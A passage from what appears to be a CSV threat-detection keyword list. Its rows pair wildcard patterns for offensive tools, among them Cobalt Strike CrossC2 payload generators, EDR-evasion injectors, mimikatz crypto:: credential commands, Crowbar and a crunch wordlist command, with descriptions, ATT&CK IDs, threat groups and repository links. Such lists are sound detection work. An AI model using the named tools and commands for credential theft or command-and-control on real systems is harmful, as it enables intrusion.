functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*CrossC2Kit_demo*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*crossc2kit_latest*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2Kit_Loader*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*CrossC2Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossC2MemScriptEng*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*CrossC2Script*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*CrossLinked*","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","915","156","2023-10-03T13:00:54Z","2019-05-16T13:36:36Z" +"*CrossNet.exe*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*Cross-Site-Scripting-XSS-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*CrossTenantSynchronizationBackdoor.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*crowbar*","offensive_tool_keyword","Crowbar","Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. to be used to attack other SSH servers.","T1110 - T1114 - T1189 - T1051 - T1552","TA0002 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/galkan/crowbar","1","0","N/A","N/A","10","1231","324","2022-12-28T16:10:59Z","2014-09-30T07:46:23Z" +"*CroweCybersecurity/ad-ldap-enum*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"*CRTInjectAsSystem*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*CRTInjectElevated*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*CRTInjectWithoutPid*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*crunch * -o *.txt*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*crypt0p3g/bof-collection*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*crypto::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::certificates*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::certtohw*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::extract*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::keys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::providers*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::sc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::scauth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::stores*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::system*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::tpminfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto_identifier*","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try 